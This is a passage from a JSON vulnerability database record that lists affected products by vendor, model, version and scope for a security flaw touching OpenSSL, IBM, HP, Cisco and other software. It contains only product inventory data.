"version": "7.2.4" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "wag310g residential gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "power ese", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571460" }, { "model": "sametime community server hf1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571431.43" }, { "model": "as infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "cognos controller if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.00" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.11" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.7" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.7" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "linux enterprise server for vmware sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1(0.625)" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "agent desktop", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "sametime community server limited use", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571470" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netezza platform software 7.0.4.8-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056340" }, { "model": "ctpos 7.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "system management homepage a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11.197" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "power system s824l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365041990" }, { "model": "system m4 hd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "flex system interconnect fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.80" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.30" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.0" }, { "model": "infosphere master data management provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "560" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10g vfsm for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "norman shark industrial control system protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power 795", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.3" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "systems insight manager update", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.31" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.51" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571430" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73210" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.21" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "1:10g switch for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.10.0" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power system s822l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571450" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504667" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.10" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205587" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1.1" }, { "model": "project openssl 0.9.8zd", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63800" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "ringmaster appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.60" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.19" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "ctpview 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos controller interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.41" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bladecenter js22", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-61x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.20" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.32" }, { "model": "1:10g switch for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.15" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "src series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079460" }, { "model": "iptv", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.2" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.8" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.213" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "web security appliance 9.0.0 -fcs", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079440" }, { "model": "bladecenter js23", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mint", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage 7.3.2.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571920" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079470" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056330" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571490" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "1:10g switch for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.80" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "bladecenter js43 with feature code", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x8446)0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.51" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x330073820" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2" }, { "model": "power system s824", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ctp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7500" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "sparc enterprise m3000", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "power systems e880", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.0" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "ctpos 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": 